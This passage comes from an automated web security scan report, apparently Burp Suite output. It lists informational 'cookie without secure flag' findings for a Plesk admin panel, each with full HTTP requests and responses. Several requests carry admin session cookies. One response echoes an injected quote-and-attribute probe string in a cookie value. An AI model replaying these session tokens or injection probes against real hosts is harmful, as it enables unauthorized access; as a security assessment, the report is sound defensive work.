Date: Sun, 20 Nov 2011 13:44:36 GMT
Connection: close
Content-Length: 9777

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.28. https://50.22.21.242:8443/admin/home/click-promo/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home/click-promo/id/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home/click-promo/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; psaContext=tools; sessionID=onthshevccsqtbfldgbmakbv

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:44:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=subscriptions; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:44:56 GMT
Connection: close
Content-Length: 9792

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.29. https://50.22.21.242:8443/admin/home/click-promo/id/promo_click_mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/home/click-promo/id/promo_click_mobile

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/home/click-promo/id/promo_click_mobile HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 13:45:13 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=resellerscbb13%22a%3D%22b%22717078d1f1a; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 13:45:16 GMT
Content-Length: 9753

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.30. https://50.22.21.242:8443/admin/index.php/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:38:29 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:38:30 GMT
Connection: close
Content-Length: 16717

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.31. https://50.22.21.242:8443/admin/index.php/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/home

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /admin/index.php/home HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/home
Content-Type: multipart/form-data; boundary=--------197049529
Content-Length: 2294
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard

----------197049529
Content-Disposition: form-data; name="cmd"

update
----------197049529
Content-Disposition: form-data; name="previous_page"


----------197049529
Content-Disposition: form
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:38:28 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:38:29 GMT
Connection: close
Content-Length: 16721

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.32. https://50.22.21.242:8443/admin/index.php/reseller/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=credentials-info

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:50 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 9999

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.33. https://50.22.21.242:8443/admin/index.php/reseller/login-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/login-info/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/login-info/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:03:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10010

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.34. https://50.22.21.242:8443/admin/index.php/reseller/personal-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/personal-info/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/personal-info/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/reseller/personal-info/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:55 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10013

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.35. https://50.22.21.242:8443/admin/index.php/reseller/tools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/tools/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/tools/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/reseller/tools/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:52 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10185

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.36. https://50.22.21.242:8443/admin/index.php/reseller/tools/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/tools/id/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/tools/id/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/reseller/tools/id/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:02:56 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10008

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.37. https://50.22.21.242:8443/admin/index.php/reseller/tools/id/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/reseller/tools/id/1/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/reseller/tools/id/1/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/admin/reseller/tools/id/1/?context=reseller-tools
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; rulelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6OTk5OTk5fQ%3D%3D; sessionID=zbwabgmusbzyeqroeknpnlxw; SSOSID=eJyrViouzo9PSU1LLM0pUbJSKqsssSg3rTCzzCotKUktKc4psMxLrzQpLE%2FJSzTOKi4ryypRqgUAGGIUIQ%3D%3D; PLESKSESSID=d1d89b662c5412350defeb3cf7a23a17; psaContext=dashboard; BarExpanded=True

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:06:37 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 07:00:09 GMT
Connection: close
Content-Length: 10010

<!DOCTYPE html>
<!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><ht
...[SNIP]...

4.38. https://50.22.21.242:8443/admin/index.php/subscription/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /admin/index.php/subscription/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/index.php/subscription/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; admin_report__report_id=2; form-nal-aps-catalog-search-show=false; 